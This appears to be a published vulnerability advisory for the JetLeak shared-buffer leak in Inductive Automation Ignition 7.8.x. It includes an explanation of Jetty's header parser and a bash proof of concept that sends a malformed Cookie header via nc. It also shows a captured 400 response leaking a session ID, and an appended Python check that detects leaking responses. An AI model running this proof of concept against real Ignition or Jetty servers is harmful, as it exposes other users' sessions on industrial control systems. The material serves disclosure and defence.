Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers


Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java

Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.

Desc: Remote unauthenticated attackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives an HTTP request, the code below is used
to parse the HTTP headers and their associated values. The server loops
through each character of a given header value and checks the following:

- On Line 1164, the server checks whether the character is printable ASCII
  (greater than space) or a negative byte, i.e. not a valid ASCII character.
- On Line 1172, the server checks whether the character is a space or tab.
- On Line 1175, the server checks whether the character is a line feed.
- If the character is non-printable ASCII (less than 0x20, other than tab
  and line feed), none of the checks above match and the code throws an
  'IllegalCharacter' exception on line 1186, passing in the illegal character
  and the shared parse buffer. The contents of that buffer are rendered into
  the reason phrase of the resulting 400 response, including data left over
  from other connections' requests.

---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
 920: protected boolean parseHeaders(ByteBuffer buffer)
 921: {
[..snip..]
1163:             case HEADER_VALUE:
1164:                 if (ch>HttpTokens.SPACE || ch<0)
1165:                 {
1166:                     _string.append((char)(0xff&ch));
1167:                     _length=_string.length();
1168:                     setState(State.HEADER_IN_VALUE);
1169:                     break;
1170:                 }
1171:
1172:                 if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173:                     break;
1174:
1175:                 if (ch==HttpTokens.LINE_FEED)
1176:                 {
1177:                     if (_length > 0)
1178:                     {
1179:                         _value=null;
1180:                         _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181:                     }
1182:                     setState(State.HEADER);
1183:                     break;
1184:                 }
1185:
1186:                 throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Ubuntu Linux 14.04
           Mac OS X
           HP-UX Itanium
           Jetty(9.2.z-SNAPSHOT)
           Java/1.8.0_73
           Java/1.8.0_66


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php

CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080

Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
         https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md


14.01.2016

---


#######################
#!/bin/bash

#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'

function normalRequest {
  echo "-- Normal Request --"

  nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63

NORMREQ
}

function badCookie {
  echo "-- Bad Cookie --"

  nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}

BADCOOKIE
}

normalRequest
echo ""
echo ""
badCookie

#######################


Original raw analysis request via proxy using Referer:
------------------------------------------------------

GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00


Response leaking part of Cookie session:
----------------------------------------

HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
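As an added example that is not part of the advisory or of Jetty's own code: a Python check that classifies a captured Jetty 400 response like the one above as leaking or not, by parsing the reason phrase for the '<<<'/'>>>' buffer excerpt and keeping only the bytes that lie beyond the offending request, which is the part that came from other traffic on the shared buffer. The non-leaking sample is a constructed assumption, not a capture from a patched server.

```python
import re

# Matches the reason phrase the vulnerable Jetty 9.2 parser produces: the offending
# byte, the parser state and a quoted excerpt of the shared buffer.
ILLEGAL_CHAR_RE = re.compile(
    r"Illegal character 0x(?P<ch>[0-9A-Fa-f]+) in state=(?P<state>\w+) in '(?P<excerpt>.*)'$"
)

# Constructed sample: the leaking 400 response quoted in the advisory, re-typed as
# bytes. The escape sequences (\r\n, \x00, ...) stay as literal text in the reason
# phrase, which is how the vulnerable parser renders the buffer into the status line.
LEAKING_RESPONSE = b"\r\n".join([
    rb"HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'",
    b"Content-Length: 0",
    b"Connection: close",
    b"Server: Jetty(9.2.z-SNAPSHOT)",
    b"",
    b"",
])

# Constructed sample (assumption, not captured from a real server): a 400 whose reason
# names the illegal byte but carries no buffer excerpt, so there is nothing to leak.
PATCHED_RESPONSE = b"HTTP/1.1 400 Illegal character 0x0\r\nContent-Length: 0\r\n\r\n"


def analyze_jetty_error(response: bytes) -> dict:
    """Classify a raw HTTP response: does its status line expose shared-buffer data?"""
    status_line = response.split(b"\r\n", 1)[0].decode("latin-1")
    m = re.match(r"HTTP/1\.[01] (\d{3}) (.*)", status_line)
    if not m or m.group(1) != "400":
        return {"illegal_char": False, "leak": False}
    reason = m.group(2)
    lm = ILLEGAL_CHAR_RE.search(reason)
    if not lm:
        # Illegal-character error without a buffer dump: no cross-session exposure here.
        return {"illegal_char": reason.startswith("Illegal character"), "leak": False}
    excerpt = lm.group("excerpt")
    # The excerpt is laid out as <consumed><<<remaining request>>><stale bytes>. Only
    # the part after '>>>' lies beyond the current request and so belonged to earlier
    # traffic on the shared buffer; that is the leak.
    leaked = excerpt.split(">>>", 1)[1] if ">>>" in excerpt else ""
    return {
        "illegal_char": True,
        "char": int(lm.group("ch"), 16),
        "state": lm.group("state"),
        "leak": bool(leaked),
        "leaked": leaked,
    }
```

Pointed at the response in the advisory it reports the illegal byte 0x0, the HEADER_VALUE state and a leaked tail beginning with SESSIONID=; a response that names the illegal character without the buffer excerpt is reported as not leaking.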